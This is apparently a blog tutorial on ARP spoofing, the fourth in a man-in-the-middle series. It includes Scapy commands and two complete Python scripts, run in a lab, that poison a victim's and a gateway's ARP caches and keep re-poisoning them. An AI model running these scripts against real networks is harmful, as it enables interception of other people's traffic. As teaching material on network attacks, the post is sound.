MITM 4: ARP spoofing (exploit)

Posted on January 31, 2012

Now that I have described how ARP works, let’s exploit the weakness: deceive the victim and the default gateway by pretending to be each of them.

There are many tools for ARP spoofing, such as Cain & Abel, Ettercap and DSniff (I will soon write a tutorial about Ettercap and Cain & Abel). To get a better understanding of ARP spoofing, I will use Scapy.

Here is the configuration: I have two Ubuntu Natty machines. I really don’t like this version of Ubuntu, but I still prefer to use Linux rather than Windows for this tutorial, and that’s what we have in the lab of my former University. Both computers are on the network 10.0.0.0/24. The attacker computer (i.e. the one that will perform the ARP spoofing attack) has the IP address 10.0.0.231 and the MAC address 00:14:38:00:00:01. The victim has the IP address 10.0.0.209 and the MAC address 00:14:38:00:00:02. The default gateway (GW) has the IP address 10.0.0.1 and the MAC address 00:19:56:00:00:01.

Let’s start by forging the ARP packet (on the attacker computer) to deceive the victim with Scapy:

 >>> arpFake = ARP()
 >>> arpFake.op=2
 >>> arpFake.psrc="10.0.0.1"
 >>> arpFake.pdst="10.0.0.209"
 >>> arpFake.hwdst="00:14:38:00:00:02"
 >>> arpFake.show()
 ###[ ARP ]###
   hwtype= 0x1
   ptype= 0x800
   hwlen= 6
   plen= 4
   op= is-at
   hwsrc= 00:14:38:00:00:01
   psrc= 10.0.0.1
   hwdst= 00:14:38:00:00:02
   pdst= 10.0.0.209

Here is the ARP table of the victim before sending the packet:

user@victim-PC:/# arp -a
? (10.0.0.1) at 00:19:56:00:00:01 [ether] on eth1
attacker-PC.local (10.0.0.231) at 00:14:38:00:00:01 [ether] eth1

You might have an empty ARP table. To get the information about both MAC addresses, you can ping them: the pings send ARP requests, which fill the table.

Then once you send the packet with Scapy:

 >>> send(arpFake)

The ARP table of the victim looks like this:

user@victim-PC:/# arp -a
? (10.0.0.1) at 00:14:38:00:00:01 [ether] on eth1
attacker-PC.local (10.0.0.231) at 00:14:38:00:00:01 [ether] eth1

The problem is that after a while, the default gateway sends an ARP reply announcing its correct MAC address.

This means the victim is no longer deceived and the communication no longer passes through the attacker. A solution to this is to sniff the traffic and, whenever the default gateway sends an ARP reply, re-spoof the victim. Here is the script:

#!/usr/bin/python

# Import scapy
from scapy.all import *

# Setting variables
attIP="10.0.0.231"
attMAC="00:14:38:00:00:01"
vicIP="10.0.0.209"
vicMAC="00:14:38:00:00:02"
dgwIP="10.0.0.1"
dgwMAC="00:19:56:00:00:01"

# Forge the ARP packet: an unsolicited reply (op=2, "is-at") that binds
# the gateway's IP to the attacker's MAC (hwsrc defaults to our interface)
arpFake = ARP()
arpFake.op=2
arpFake.psrc=dgwIP
arpFake.pdst=vicIP
arpFake.hwdst=vicMAC

# Loop: re-send the forged reply each time the real gateway
# answers an ARP request (which would restore the victim's cache)
while True:

    # Send the ARP reply
    send(arpFake)
    print("ARP sent")

    # Block until the next ARP packet involving the default GW
    sniff(filter="arp and host 10.0.0.1", count=1)

Once again, to run this script, save it as a Python file (for instance under the name arpspoof.py) and run it with administrator privileges (root): sudo python arpspoof.py

This is how to spoof the ARP table of the victim. Now the communication from the victim to networks outside 10.0.0.0/24 (and therefore sent first to the default gateway) passes through the attacker. But the communication from the default gateway to the victim still goes directly to the victim, because the default gateway’s ARP table has not been spoofed. Here is the script to spoof both the victim and the default GW:

#!/usr/bin/python

# Import scapy
from scapy.all import *

# Setting variables
attIP="10.0.0.231"
attMAC="00:14:38:00:00:01"
vicIP="10.0.0.209"
vicMAC="00:14:38:00:00:02"
dgwIP="10.0.0.1"
dgwMAC="00:19:56:00:00:01"

# Forge the ARP packet for the victim (GW IP -> attacker MAC)
arpFakeVic = ARP()
arpFakeVic.op=2
arpFakeVic.psrc=dgwIP
arpFakeVic.pdst=vicIP
arpFakeVic.hwdst=vicMAC

# Forge the ARP packet for the default GW (victim IP -> attacker MAC)
arpFakeDGW = ARP()
arpFakeDGW.op=2
arpFakeDGW.psrc=vicIP
arpFakeDGW.pdst=dgwIP
arpFakeDGW.hwdst=dgwMAC

# Loop: re-send both forged replies each time either side
# sends a genuine ARP packet (which would restore a cache)
while True:

    # Send the ARP replies
    send(arpFakeVic)
    send(arpFakeDGW)
    print("ARP sent")

    # Block until the next ARP packet from the GW or the victim
    # (parentheses matter: "arp and A or B" would match any IP traffic from B)
    sniff(filter="arp and (host 10.0.0.1 or host 10.0.0.209)", count=1)

Now that the ARP spoofing is done, if you browse a website from the victim’s computer, you may find the connection blocked. The reason is that most computers don’t forward a packet whose destination IP address doesn’t match their own. The next post will describe how to forward IP packets on Linux and OS X using sysctl.
